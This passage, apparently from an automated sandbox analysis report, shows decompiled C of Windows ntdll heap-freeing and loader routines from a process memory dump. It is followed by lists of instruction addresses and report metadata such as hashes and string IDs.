					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E030EA229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E030EA309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E0311D540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E030CB150();
								} else {
									E030CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E030CB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x31b6378 = 1;
									asm("int3");
									 *0x31b6378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E0317FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E0318A80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E0311D540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E030CB150();
													} else {
														E030CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E030CB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x31b6378 = 1;
														asm("int3");
														 *0x31b6378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E030EA229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E030EA309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E030EBC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E0318A80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E0311D540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E030CB150();
													} else {
														E030CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E030CB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x31b6378 = 1;
														asm("int3");
														 *0x31b6378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E030EA229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E030EA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E030EBC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E030EBC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}




















































































                                                                                                                                                    0x030e99ca
                                                                                                                                                    0x030e99cc
                                                                                                                                                    0x030e99df
                                                                                                                                                    0x030e99e3
                                                                                                                                                    0x030e99f8
                                                                                                                                                    0x030e99fb
                                                                                                                                                    0x030e99fb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e9a48
                                                                                                                                                    0x030e9a48
                                                                                                                                                    0x030e9a4c
                                                                                                                                                    0x030e9a51
                                                                                                                                                    0x030e9a55
                                                                                                                                                    0x030e9a61
                                                                                                                                                    0x030e9a66
                                                                                                                                                    0x030e9a68
                                                                                                                                                    0x03131457
                                                                                                                                                    0x0313145c
                                                                                                                                                    0x0313145c
                                                                                                                                                    0x030e9a68
                                                                                                                                                    0x030e9a6e
                                                                                                                                                    0x030e9a71
                                                                                                                                                    0x030e9a74
                                                                                                                                                    0x030e9a76
                                                                                                                                                    0x03131466
                                                                                                                                                    0x03131469
                                                                                                                                                    0x03131469
                                                                                                                                                    0x0313146c
                                                                                                                                                    0x0313146e
                                                                                                                                                    0x03131471
                                                                                                                                                    0x03131474
                                                                                                                                                    0x03131477
                                                                                                                                                    0x03131479
                                                                                                                                                    0x0313159c
                                                                                                                                                    0x0313159c
                                                                                                                                                    0x0313159d
                                                                                                                                                    0x031315a6
                                                                                                                                                    0x031315ab
                                                                                                                                                    0x031315ab
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031315ab
                                                                                                                                                    0x0313147f
                                                                                                                                                    0x03131481
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313148a
                                                                                                                                                    0x0313148d
                                                                                                                                                    0x03131493
                                                                                                                                                    0x03131495
                                                                                                                                                    0x031314c0
                                                                                                                                                    0x031314c0
                                                                                                                                                    0x031314c3
                                                                                                                                                    0x031314c6
                                                                                                                                                    0x031314c8
                                                                                                                                                    0x031314cb
                                                                                                                                                    0x031314cf
                                                                                                                                                    0x031314f2
                                                                                                                                                    0x031314f2
                                                                                                                                                    0x031314f5
                                                                                                                                                    0x031314f8
                                                                                                                                                    0x03131501
                                                                                                                                                    0x03131508
                                                                                                                                                    0x0313150b
                                                                                                                                                    0x0313150e
                                                                                                                                                    0x03131510
                                                                                                                                                    0x03131513
                                                                                                                                                    0x03131515
                                                                                                                                                    0x03131515
                                                                                                                                                    0x03131518
                                                                                                                                                    0x03131518
                                                                                                                                                    0x03131513
                                                                                                                                                    0x03131521
                                                                                                                                                    0x03131525
                                                                                                                                                    0x0313152a
                                                                                                                                                    0x0313152d
                                                                                                                                                    0x03131530
                                                                                                                                                    0x03131532
                                                                                                                                                    0x03131539
                                                                                                                                                    0x0313153d
                                                                                                                                                    0x0313155d
                                                                                                                                                    0x03131562
                                                                                                                                                    0x0313153f
                                                                                                                                                    0x03131555
                                                                                                                                                    0x0313155a
                                                                                                                                                    0x03131570
                                                                                                                                                    0x03131577
                                                                                                                                                    0x0313157c
                                                                                                                                                    0x03131582
                                                                                                                                                    0x03131585
                                                                                                                                                    0x03131589
                                                                                                                                                    0x0313158b
                                                                                                                                                    0x03131592
                                                                                                                                                    0x03131593
                                                                                                                                                    0x03131593
                                                                                                                                                    0x03131589
                                                                                                                                                    0x03131530
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031314f8
                                                                                                                                                    0x031314d5
                                                                                                                                                    0x031314da
                                                                                                                                                    0x031314dc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031314de
                                                                                                                                                    0x031314e8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031314e8
                                                                                                                                                    0x03131497
                                                                                                                                                    0x03131497
                                                                                                                                                    0x031314a4
                                                                                                                                                    0x031314a4
                                                                                                                                                    0x031314a7
                                                                                                                                                    0x031314a9
                                                                                                                                                    0x031314ab
                                                                                                                                                    0x031314ab
                                                                                                                                                    0x0313149c
                                                                                                                                                    0x0313149e
                                                                                                                                                    0x031314a0
                                                                                                                                                    0x031314b0
                                                                                                                                                    0x031314b0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031314a2
                                                                                                                                                    0x031314a2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031314a2
                                                                                                                                                    0x031314a0
                                                                                                                                                    0x031314b3
                                                                                                                                                    0x031314bb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031314bb
                                                                                                                                                    0x03131495
                                                                                                                                                    0x030e9a7c
                                                                                                                                                    0x030e9a7c
                                                                                                                                                    0x030e9a7f
                                                                                                                                                    0x030e9a7f
                                                                                                                                                    0x030e9a82
                                                                                                                                                    0x030e9a84
                                                                                                                                                    0x030e9a87
                                                                                                                                                    0x030e9a8a
                                                                                                                                                    0x030e9a8d
                                                                                                                                                    0x030e9a8f
                                                                                                                                                    0x0313166a
                                                                                                                                                    0x0313166a
                                                                                                                                                    0x0313166b
                                                                                                                                                    0x03131674
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03131674
                                                                                                                                                    0x030e9a95
                                                                                                                                                    0x030e9a97
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e9aa0
                                                                                                                                                    0x030e9aa3
                                                                                                                                                    0x030e9aa9
                                                                                                                                                    0x030e9aab
                                                                                                                                                    0x030e9ad7
                                                                                                                                                    0x030e9ad7
                                                                                                                                                    0x030e9ada
                                                                                                                                                    0x030e9add
                                                                                                                                                    0x030e9adf
                                                                                                                                                    0x030e9ae2
                                                                                                                                                    0x030e9ae6
                                                                                                                                                    0x030e9b22
                                                                                                                                                    0x030e9b27
                                                                                                                                                    0x030e9b29
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e9b2b
                                                                                                                                                    0x031315be
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031315be
                                                                                                                                                    0x030e9b29
                                                                                                                                                    0x030e9ae8
                                                                                                                                                    0x030e9ae8
                                                                                                                                                    0x030e9aeb
                                                                                                                                                    0x030e9aee
                                                                                                                                                    0x031315cb
                                                                                                                                                    0x031315d2
                                                                                                                                                    0x031315d5
                                                                                                                                                    0x031315d7
                                                                                                                                                    0x031315da
                                                                                                                                                    0x031315dc
                                                                                                                                                    0x031315dc
                                                                                                                                                    0x031315dc
                                                                                                                                                    0x031315da
                                                                                                                                                    0x031315e5
                                                                                                                                                    0x031315e9
                                                                                                                                                    0x031315ee
                                                                                                                                                    0x031315f1
                                                                                                                                                    0x031315f3
                                                                                                                                                    0x031315f9
                                                                                                                                                    0x03131600
                                                                                                                                                    0x03131604
                                                                                                                                                    0x03131624
                                                                                                                                                    0x03131629
                                                                                                                                                    0x03131606
                                                                                                                                                    0x0313161c
                                                                                                                                                    0x03131621
                                                                                                                                                    0x03131637
                                                                                                                                                    0x0313163e
                                                                                                                                                    0x03131643
                                                                                                                                                    0x03131649
                                                                                                                                                    0x0313164c
                                                                                                                                                    0x03131650
                                                                                                                                                    0x03131656
                                                                                                                                                    0x0313165d
                                                                                                                                                    0x0313165e
                                                                                                                                                    0x0313165e
                                                                                                                                                    0x03131650
                                                                                                                                                    0x031315f3
                                                                                                                                                    0x030e9af4
                                                                                                                                                    0x030e9af7
                                                                                                                                                    0x030e9afc
                                                                                                                                                    0x030e9b00
                                                                                                                                                    0x030e9b04
                                                                                                                                                    0x030e9b08
                                                                                                                                                    0x030e9b14
                                                                                                                                                    0x030e99fe
                                                                                                                                                    0x030e9a04
                                                                                                                                                    0x030e9a07
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e9a29
                                                                                                                                                    0x0313169c
                                                                                                                                                    0x031316a0
                                                                                                                                                    0x031316a5
                                                                                                                                                    0x031316a9
                                                                                                                                                    0x031316b5
                                                                                                                                                    0x031316ba
                                                                                                                                                    0x031316bc
                                                                                                                                                    0x031316be
                                                                                                                                                    0x031316c3
                                                                                                                                                    0x031316c3
                                                                                                                                                    0x031316bc
                                                                                                                                                    0x031316c8
                                                                                                                                                    0x031316cc
                                                                                                                                                    0x0313181b
                                                                                                                                                    0x0313181b
                                                                                                                                                    0x0313181e
                                                                                                                                                    0x0313181e
                                                                                                                                                    0x03131821
                                                                                                                                                    0x03131823
                                                                                                                                                    0x03131826
                                                                                                                                                    0x03131829
                                                                                                                                                    0x0313182c
                                                                                                                                                    0x0313182e
                                                                                                                                                    0x03131688
                                                                                                                                                    0x03131688
                                                                                                                                                    0x03131689
                                                                                                                                                    0x0313168b
                                                                                                                                                    0x0313168c
                                                                                                                                                    0x0313168d
                                                                                                                                                    0x0313168f
                                                                                                                                                    0x03131692
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03131692
                                                                                                                                                    0x03131834
                                                                                                                                                    0x03131836
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313183f
                                                                                                                                                    0x03131842
                                                                                                                                                    0x03131848
                                                                                                                                                    0x0313184a
                                                                                                                                                    0x03131875
                                                                                                                                                    0x03131875
                                                                                                                                                    0x03131878
                                                                                                                                                    0x0313187b
                                                                                                                                                    0x0313187d
                                                                                                                                                    0x03131880
                                                                                                                                                    0x03131884
                                                                                                                                                    0x031318a7
                                                                                                                                                    0x031318a7
                                                                                                                                                    0x031318aa
                                                                                                                                                    0x031318ad
                                                                                                                                                    0x031318b6
                                                                                                                                                    0x031318bd
                                                                                                                                                    0x031318c0
                                                                                                                                                    0x031318c3
                                                                                                                                                    0x031318c5
                                                                                                                                                    0x031318c8
                                                                                                                                                    0x031318ca
                                                                                                                                                    0x031318ca
                                                                                                                                                    0x031318cd
                                                                                                                                                    0x031318cd
                                                                                                                                                    0x031318c8
                                                                                                                                                    0x031318d5
                                                                                                                                                    0x031318da
                                                                                                                                                    0x031318df
                                                                                                                                                    0x031318e2
                                                                                                                                                    0x031318e5
                                                                                                                                                    0x031318e7
                                                                                                                                                    0x031318ee
                                                                                                                                                    0x031318f2
                                                                                                                                                    0x03131912
                                                                                                                                                    0x03131917
                                                                                                                                                    0x031318f4
                                                                                                                                                    0x0313190a
                                                                                                                                                    0x0313190f
                                                                                                                                                    0x03131925
                                                                                                                                                    0x0313192c
                                                                                                                                                    0x03131931
                                                                                                                                                    0x0313193a
                                                                                                                                                    0x0313193e
                                                                                                                                                    0x03131940
                                                                                                                                                    0x03131947
                                                                                                                                                    0x03131948
                                                                                                                                                    0x03131948
                                                                                                                                                    0x0313193e
                                                                                                                                                    0x031318e5
                                                                                                                                                    0x0313194f
                                                                                                                                                    0x03131952
                                                                                                                                                    0x03131956
                                                                                                                                                    0x0313195d
                                                                                                                                                    0x03131961
                                                                                                                                                    0x0313196d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313196d
                                                                                                                                                    0x0313188a
                                                                                                                                                    0x0313188f
                                                                                                                                                    0x03131891
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313189d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313189d
                                                                                                                                                    0x0313184c
                                                                                                                                                    0x03131859
                                                                                                                                                    0x03131859
                                                                                                                                                    0x0313185c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03131851
                                                                                                                                                    0x03131853
                                                                                                                                                    0x03131855
                                                                                                                                                    0x03131865
                                                                                                                                                    0x03131865
                                                                                                                                                    0x03131866
                                                                                                                                                    0x03131868
                                                                                                                                                    0x03131870
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03131870
                                                                                                                                                    0x03131857
                                                                                                                                                    0x03131857
                                                                                                                                                    0x0313185e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031316d2
                                                                                                                                                    0x031316d2
                                                                                                                                                    0x031316d5
                                                                                                                                                    0x031316d5
                                                                                                                                                    0x031316d8
                                                                                                                                                    0x031316da
                                                                                                                                                    0x031316dd
                                                                                                                                                    0x031316e0
                                                                                                                                                    0x031316e3
                                                                                                                                                    0x031316e5
                                                                                                                                                    0x03131808
                                                                                                                                                    0x03131808
                                                                                                                                                    0x03131809
                                                                                                                                                    0x03131812
                                                                                                                                                    0x03131817
                                                                                                                                                    0x03131817
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03131817
                                                                                                                                                    0x031316eb
                                                                                                                                                    0x031316ed
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031316f6
                                                                                                                                                    0x031316f9
                                                                                                                                                    0x031316ff
                                                                                                                                                    0x03131701
                                                                                                                                                    0x0313172c
                                                                                                                                                    0x0313172c
                                                                                                                                                    0x0313172f
                                                                                                                                                    0x03131732
                                                                                                                                                    0x03131734
                                                                                                                                                    0x03131737
                                                                                                                                                    0x0313173b
                                                                                                                                                    0x0313175e
                                                                                                                                                    0x0313175e
                                                                                                                                                    0x03131761
                                                                                                                                                    0x03131764
                                                                                                                                                    0x0313176d
                                                                                                                                                    0x03131774
                                                                                                                                                    0x03131777
                                                                                                                                                    0x0313177a
                                                                                                                                                    0x0313177c
                                                                                                                                                    0x0313177f
                                                                                                                                                    0x03131781
                                                                                                                                                    0x03131781
                                                                                                                                                    0x03131784
                                                                                                                                                    0x03131784
                                                                                                                                                    0x0313177f
                                                                                                                                                    0x0313178c
                                                                                                                                                    0x03131791
                                                                                                                                                    0x03131796
                                                                                                                                                    0x03131799
                                                                                                                                                    0x0313179c
                                                                                                                                                    0x0313179e
                                                                                                                                                    0x031317a5
                                                                                                                                                    0x031317a9
                                                                                                                                                    0x031317c9
                                                                                                                                                    0x031317ce
                                                                                                                                                    0x031317ab
                                                                                                                                                    0x031317c1
                                                                                                                                                    0x031317c6
                                                                                                                                                    0x031317dc
                                                                                                                                                    0x031317e3
                                                                                                                                                    0x031317e8
                                                                                                                                                    0x031317ee
                                                                                                                                                    0x031317f1
                                                                                                                                                    0x031317f5
                                                                                                                                                    0x031317f7
                                                                                                                                                    0x031317fe
                                                                                                                                                    0x031317ff
                                                                                                                                                    0x031317ff
                                                                                                                                                    0x031317f5
                                                                                                                                                    0x0313179c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03131764
                                                                                                                                                    0x03131741
                                                                                                                                                    0x03131746
                                                                                                                                                    0x03131748
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03131754
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03131754
                                                                                                                                                    0x03131703
                                                                                                                                                    0x03131710
                                                                                                                                                    0x03131710
                                                                                                                                                    0x03131713
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03131708
                                                                                                                                                    0x0313170a
                                                                                                                                                    0x0313170c
                                                                                                                                                    0x0313171c
                                                                                                                                                    0x0313171c
                                                                                                                                                    0x0313171d
                                                                                                                                                    0x0313171f
                                                                                                                                                    0x03131727
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03131727
                                                                                                                                                    0x0313170e
                                                                                                                                                    0x0313170e
                                                                                                                                                    0x03131715
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03131715
                                                                                                                                                    0x031316cc
                                                                                                                                                    0x030e9a45
                                                                                                                                                    0x030e9a45
                                                                                                                                                    0x030e9a0e
                                                                                                                                                    0x030e9a1c
                                                                                                                                                    0x030e9a23
                                                                                                                                                    0x0313167e
                                                                                                                                                    0x0313167f
                                                                                                                                                    0x03131681
                                                                                                                                                    0x03131683
                                                                                                                                                    0x03131684
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03131684
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e9aad
                                                                                                                                                    0x030e9aad
                                                                                                                                                    0x030e9ab0
                                                                                                                                                    0x030e9ab3
                                                                                                                                                    0x030e9ab3
                                                                                                                                                    0x030e9ab6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e9ab8
                                                                                                                                                    0x030e9aba
                                                                                                                                                    0x030e9abc
                                                                                                                                                    0x030e9ac8
                                                                                                                                                    0x030e9ac8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e9abe
                                                                                                                                                    0x030e9abe
                                                                                                                                                    0x030e9ac0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e9ac0
                                                                                                                                                    0x030e9abc
                                                                                                                                                    0x030e9ad2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030e9ad2
                                                                                                                                                    0x030e9aab

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                    • API String ID: 0-3178619729
                                                                                                                                                    • Opcode ID: bbb5073192748deadfef2741227a7d316006d8f6df77823689fd7906e95dbfe3
                                                                                                                                                    • Instruction ID: c00a12c925fdd4bd109699e4d18c42172dc137527d75eee89b7e0f9ddcc1d323
                                                                                                                                                    • Opcode Fuzzy Hash: bbb5073192748deadfef2741227a7d316006d8f6df77823689fd7906e95dbfe3
                                                                                                                                                    • Instruction Fuzzy Hash: DF220370700245AFDB28EF68C485BBABBF5EF4A704F1885ADE8468B341E735D885CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030D8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                    			E030D8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E030D934A() != 0) {
								_t159 = E0314A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x31b5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E03145510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x31b5780; // 0x0
									}
